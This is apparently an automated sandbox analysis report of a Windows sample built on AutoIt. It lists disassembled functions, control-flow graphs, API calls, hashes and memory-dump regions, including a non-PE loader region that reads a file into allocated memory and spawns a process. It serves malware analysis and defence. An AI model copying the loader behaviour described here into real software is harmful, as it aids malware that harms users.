                                                                                              • Instruction Fuzzy Hash: 17417C3530420CE7DF14ABB89D0DFB93A19F746354F04811AFB1286292DB7DCE4187A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 502 a28d45-a28d55 503 a28d57-a28d6a call a1f2c6 call a1f2d9 502->503 504 a28d6f-a28d71 502->504 518 a290f1 503->518 505 a28d77-a28d7d 504->505 506 a290d9-a290e6 call a1f2c6 call a1f2d9 504->506 505->506 509 a28d83-a28dae 505->509 523 a290ec call a227ec 506->523 509->506 513 a28db4-a28dbd 509->513 516 a28dd7-a28dd9 513->516 517 a28dbf-a28dd2 call a1f2c6 call a1f2d9 513->517 521 a290d5-a290d7 516->521 522 a28ddf-a28de3 516->522 517->523 524 a290f4-a290f9 518->524 521->524 522->521 526 a28de9-a28ded 522->526 523->518 526->517 529 a28def-a28e06 526->529 531 a28e23-a28e2c 529->531 532 a28e08-a28e0b 529->532 535 a28e4a-a28e54 531->535 536 a28e2e-a28e45 call a1f2c6 call a1f2d9 call a227ec 531->536 533 a28e15-a28e1e 532->533 534 a28e0d-a28e13 532->534 537 a28ebf-a28ed9 533->537 534->533 534->536 539 a28e56-a28e58 535->539 540 a28e5b-a28e79 call a23820 call a229c8 * 2 535->540 567 a2900c 536->567 542 a28edf-a28eef 537->542 543 a28fad-a28fb6 call a2f89b 537->543 539->540 571 a28e96-a28ebc call a29424 540->571 572 a28e7b-a28e91 call a1f2d9 call a1f2c6 540->572 542->543 547 a28ef5-a28ef7 542->547 555 a28fb8-a28fca 543->555 556 a29029 543->556 547->543 551 a28efd-a28f23 547->551 551->543 557 a28f29-a28f3c 551->557 555->556 562 a28fcc-a28fdb GetConsoleMode 555->562 560 a2902d-a29045 ReadFile 556->560 557->543 558 a28f3e-a28f40 557->558 558->543 563 a28f42-a28f6d 558->563 565 a290a1-a290ac GetLastError 560->565 566 a29047-a2904d 560->566 562->556 568 a28fdd-a28fe1 562->568 563->543 570 a28f6f-a28f82 563->570 573 a290c5-a290c8 565->573 574 a290ae-a290c0 call a1f2d9 call a1f2c6 565->574 566->565 575 a2904f 566->575 569 a2900f-a29019 call a229c8 567->569 568->560 576 a28fe3-a28ffd ReadConsoleW 568->576 569->524 570->543 578 a28f84-a28f86 570->578 571->537 572->567 585 a29005-a2900b call a1f2a3 573->585 586 a290ce-a290d0 573->586 574->567 582 a29052-a29064 575->582 583 a2901e-a29027 576->583 584 a28fff GetLastError 576->584 578->543 588 a28f88-a28fa8 578->588 582->569 592 a29066-a2906a 582->592 583->582 584->585 585->567 586->569 588->543 596 a29083-a2908e 592->596 597 a2906c-a2907c call a28a61 592->597 599 a29090 call a28bb1 596->599 600 a2909a-a2909f call a288a1 596->600 609 a2907f-a29081 597->609 607 a29095-a29098 599->607 600->607 607->609 609->569
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 906ab4a7190dc4c9dc5ebf4bb01b04f8d79000f09ad33d993f1534df2a94717b
                                                                                              • Instruction ID: b8c08712fbf00c2756f6dbb11065d10cccd75ae10c04dd55fc3f167660ec54fe
                                                                                              • Opcode Fuzzy Hash: 906ab4a7190dc4c9dc5ebf4bb01b04f8d79000f09ad33d993f1534df2a94717b
                                                                                              • Instruction Fuzzy Hash: 54C1D375E08269AFDB11DFACE941BEEBBB0BF09310F044069F515A7392CB349942CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 610 190920-190972 call 190820 CreateFileW 613 19097b-190988 610->613 614 190974-190976 610->614 617 19099b-1909b5 VirtualAlloc 613->617 618 19098a-190996 613->618 615 190b36-190b3a 614->615 619 1909be-1909e4 CreateFileW 617->619 620 1909b7-1909b9 617->620 618->615 621 190a08-190a22 ReadFile 619->621 622 1909e6-190a03 619->622 620->615 624 190a24-190a41 621->624 625 190a46-190a4a 621->625 622->615 624->615 627 190a4c-190a69 625->627 628 190a6e-190a74 625->628 627->615 629 190a7f-190aa2 628->629 631 190aa4 629->631 632 190ac7-190ae1 WriteFile 629->632 635 190aae-190ac5 631->635 636 190aa6-190aac 631->636 637 190b0c-190b31 CloseHandle VirtualFree 632->637 638 190ae3-190b0a 632->638 635->629 636->632 636->635 637->615 638->615
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00190965
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                                                                                              • Instruction ID: 3fc970e655ad4dcf05aa7f8ecf5b36a8a7a7b74dae55fcc372fc7fb2c2995a5e
                                                                                              • Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                                                                                              • Instruction Fuzzy Hash: FA71C675A10208EFDF24DFA4CC85FEEB7B5AF48704F108558F606AB280DB74AA44DB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 657 9f2c63-9f2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: 82f07e83cf8aee607d30b23be9f99a8232f67d693e618d2a613ab42dc92d165e
                                                                                              • Instruction ID: 8a14962d6a53a7f1ff034268abc3e9b5330faa49001dba2c37900067aafc8d79
                                                                                              • Opcode Fuzzy Hash: 82f07e83cf8aee607d30b23be9f99a8232f67d693e618d2a613ab42dc92d165e
                                                                                              • Instruction Fuzzy Hash: EAF03A796402D07AEB709793AC0CE773EBDD7C7F64B02005AF900AA6A1D2710852DEB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 658 a261fe-a26217 659 a26219-a26229 call a2fe21 658->659 660 a2622d-a26232 658->660 659->660 667 a2622b 659->667 662 a26234-a2623c 660->662 663 a2623f-a26263 MultiByteToWideChar 660->663 662->663 665 a263f6-a26409 call a10a8c 663->665 666 a26269-a26275 663->666 668 a26277-a26288 666->668 669 a262c9 666->669 667->660 672 a262a7-a262b8 call a23820 668->672 673 a2628a-a26299 call a32040 668->673 671 a262cb-a262cd 669->671 675 a262d3-a262e6 MultiByteToWideChar 671->675 676 a263eb 671->676 672->676 686 a262be 672->686 673->676 685 a2629f-a262a5 673->685 675->676 679 a262ec-a262fe call a23467 675->679 680 a263ed-a263f4 call a21537 676->680 688 a26303-a26307 679->688 680->665 687 a262c4-a262c7 685->687 686->687 687->671 688->676 690 a2630d-a26314 688->690 691 a26316-a2631b 690->691 692 a2634e-a2635a 690->692 691->680 693 a26321-a26323 691->693 694 a263a6 692->694 695 a2635c-a2636d 692->695 693->676 698 a26329-a26343 call a23467 693->698 699 a263a8-a263aa 694->699 696 a26388-a26399 call a23820 695->696 697 a2636f-a2637e call a32040 695->697 703 a263e4-a263ea call a21537 696->703 712 a2639b 696->712 697->703 710 a26380-a26386 697->710 698->680 713 a26349 698->713 699->703 704 a263ac-a263c5 call a23467 699->704 703->676 704->703 716 a263c7-a263ce 704->716 715 a263a1-a263a4 710->715 712->715 713->676 715->699 717 a263d0-a263d1 716->717 718 a2640a-a26410 716->718 719 a263d2-a263e2 WideCharToMultiByte 717->719 718->719 719->703 720 a26412-a26419 call a21537 719->720 720->680
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A182D9,00A182D9,?,?,?,00A2644F,00000001,00000001,8BE85006), ref: 00A26258
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A2644F,00000001,00000001,8BE85006,?,?,?), ref: 00A262DE
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A263D8
                                                                                              • __freea.LIBCMT ref: 00A263E5
                                                                                                • Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852
                                                                                              • __freea.LIBCMT ref: 00A263EE
                                                                                              • __freea.LIBCMT ref: 00A26413
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 86f2316d648e739f243072423bda413dab1c76f7a05cd9a114afa6989c0d4c46
                                                                                              • Instruction ID: 6807046d0889ccf56cd4d24bafc87114235b2beba00fc9d50479a89fcf4bed32
                                                                                              • Opcode Fuzzy Hash: 86f2316d648e739f243072423bda413dab1c76f7a05cd9a114afa6989c0d4c46
                                                                                              • Instruction Fuzzy Hash: 6E51D172A01226ABEF259F68ED81EAF77A9EF44750F154679FC05DA180DB34DC40C6A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A62C05
                                                                                              • DeleteFileW.KERNEL32(?), ref: 00A62C87
                                                                                              • CopyFileW.KERNEL32 ref: 00A62C9D
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A62CAE
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A62CC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$Copy
                                                                                              • String ID:
                                                                                              • API String ID: 3226157194-0
                                                                                              • Opcode ID: 4f0a0255c6955370a6ec335deef95f71598dbea6fb2c37ca2945b43f7ddd38c6
                                                                                              • Instruction ID: 8691d87c21b8d925f8a343e37d6d41f83895f096a84165e9862e45bae8e509ed
                                                                                              • Opcode Fuzzy Hash: 4f0a0255c6955370a6ec335deef95f71598dbea6fb2c37ca2945b43f7ddd38c6
                                                                                              • Instruction Fuzzy Hash: 0BB12C72D0051DABDF21EBA4CD85FEEBBBDEF49350F1040A6F609E6151EA309A448F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 943 192440-192555 call 190000 call 192330 CreateFileW 950 19255c-19256c 943->950 951 192557 943->951 954 19256e 950->954 955 192573-19258d VirtualAlloc 950->955 952 192629-19262e 951->952 954->952 956 19258f 955->956 957 192594-1925ab ReadFile 955->957 956->952 958 1925ad 957->958 959 1925af-1925c4 call 1910d0 957->959 958->952 961 1925c9-192603 call 192370 call 191330 959->961 966 19261f-192627 961->966 967 192605-19261a call 1923c0 961->967 966->952 967->966
                                                                                              APIs
                                                                                                • Part of subcall function 00192330: Sleep.KERNELBASE(000001F4), ref: 00192341
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0019254B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileSleep
                                                                                              • String ID: J4XZWXL54J4661J
                                                                                              • API String ID: 2694422964-1089018925
                                                                                              • Opcode ID: 6f2a21149c649fb9989fcdc149a11f9c503cf28596870597020a0efb808fa96e
                                                                                              • Instruction ID: e55cffaf80794526fad9be0cbe959355fc79f016ca202a63d9e252da2be1232c
                                                                                              • Opcode Fuzzy Hash: 6f2a21149c649fb9989fcdc149a11f9c503cf28596870597020a0efb808fa96e
                                                                                              • Instruction Fuzzy Hash: B2518331D14249EBEF15DBA4C815BEFBB78AF59300F108199E608BB2C0D7791B49CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32 ref: 009F3B40
                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 009F3B61
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 009F3B83
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: e739af615b28a1b25279c07b75e09261fca5c96a735b51b86b6ebf9cdc5b07bd
                                                                                              • Instruction ID: 6285c50b590172289a5eae599e0e62ae59f4dff9b4c87253fb563c84283e261c
                                                                                              • Opcode Fuzzy Hash: e739af615b28a1b25279c07b75e09261fca5c96a735b51b86b6ebf9cdc5b07bd
                                                                                              • Instruction Fuzzy Hash: 10115AB1511208FFDB20CFA4DC44ABEB7BCEF00791B10895AA901D7110E2359E419B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Variable must be of type 'Object'., xrefs: 00A432B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Variable must be of type 'Object'.
                                                                                              • API String ID: 0-109567571
                                                                                              • Opcode ID: 5dc0d799862403ca0d7b9d2f27f034fdfbe75060867aabac9a8adc326a956d4d
                                                                                              • Instruction ID: a2b526d2b7a95549f59c707093752588730666305fe053f38d9beefffacf7d0d
                                                                                              • Opcode Fuzzy Hash: 5dc0d799862403ca0d7b9d2f27f034fdfbe75060867aabac9a8adc326a956d4d
                                                                                              • Instruction Fuzzy Hash: CCC28A75A00209CFCB24CF98D884BBDB7B5BF48310F248569EA16AB3A1D775ED41CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,009F13C6,00000000,00000000,?,00A2301A,009F13C6,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue), ref: 00A230A5
                                                                                              • GetLastError.KERNEL32(?,00A2301A,009F13C6,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue,00A92290,FlsSetValue,00000000,00000364,?,00A22E46), ref: 00A230B1
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A2301A,009F13C6,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue,00A92290,FlsSetValue,00000000), ref: 00A230BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: e986a2b74923772353d81041103e2ab5433f2b9b9074fbd4cfd083dd82a4171d
                                                                                              • Instruction ID: 73d5f99842bbb831ad55023b5fa70b3879a27d640bd84cb4351df24cb2b2e829
                                                                                              • Opcode Fuzzy Hash: e986a2b74923772353d81041103e2ab5433f2b9b9074fbd4cfd083dd82a4171d
                                                                                              • Instruction Fuzzy Hash: C4017533709236ABCF218BBDBC4495677A89F46B71B110634E905E7140D725D9028AF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 009FFE66
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID:
                                                                                              • API String ID: 1385522511-0
                                                                                              • Opcode ID: c2dad227023de7e6b174d82b14f7807d3113ed221a2a1cf670d8a8af0e1cbe9c
                                                                                              • Instruction ID: 9f3279e568b5c6f087ad4dc663d546278b3008e7f6cbf75dfe602658ba4fd2bf
                                                                                              • Opcode Fuzzy Hash: c2dad227023de7e6b174d82b14f7807d3113ed221a2a1cf670d8a8af0e1cbe9c
                                                                                              • Instruction Fuzzy Hash: 6AB26874608349CFCB24CF18D4A0B2AB7E1BF89314F24496DEA959B3A1D775EC41CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00A10668
                                                                                                • Part of subcall function 00A132A4: RaiseException.KERNEL32(?,?,?,00A1068A,?,00AC1444,?,?,?,?,?,?,00A1068A,009F1129,00AB8738,009F1129), ref: 00A13304
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00A10685
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                              • String ID: Unknown exception
                                                                                              • API String ID: 3476068407-410509341
                                                                                              • Opcode ID: 60efd2801232e2c33b6e292b63cc0bb5f353e3dde8e1e5ea8f144740931d829b
                                                                                              • Instruction ID: 17d30a0ecee03423ce884a245a8e7ccc9230eecb259a6dabc9cc05434f257152
                                                                                              • Opcode Fuzzy Hash: 60efd2801232e2c33b6e292b63cc0bb5f353e3dde8e1e5ea8f144740931d829b
                                                                                              • Instruction Fuzzy Hash: 46F0C23490030DBBCF10BB68E956CDE7B6D6E00354B608531B924E69D2EFB1DAE6C680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 001910A5
                                                                                              • ExitProcess.KERNELBASE(00000000), ref: 001910C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CreateExit
                                                                                              • String ID: D
                                                                                              • API String ID: 126409537-2746444292
                                                                                              • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                                                              • Instruction ID: 88a78f859713284d90b524f965b147c9bc206a357fa9c00d352027d66767015f
                                                                                              • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                                                              • Instruction Fuzzy Hash: 06F0EC7294024CABDF60DFE0CC49FEE777CBF04701F548508FA0A9A180DB7596488B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00A6302F
                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A63044
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$FileNamePath
                                                                                              • String ID: aut
                                                                                              • API String ID: 3285503233-3010740371
                                                                                              • Opcode ID: a6f76ea2880a9d3a6d719354144fe0d673d782916fee65c687585e2e11cafff6
                                                                                              • Instruction ID: ec9f6303e5c96cbf73b1aab8cc2dce44396a855fc5cae3aa2c8926f919d94cee
                                                                                              • Opcode Fuzzy Hash: a6f76ea2880a9d3a6d719354144fe0d673d782916fee65c687585e2e11cafff6
                                                                                              • Instruction Fuzzy Hash: C1D05E7250032877DA20E7E4AC0EFCB3A6CEB04760F0006A1B655E20D1EAB49985CFE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A782F5
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00A782FC
                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A784DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
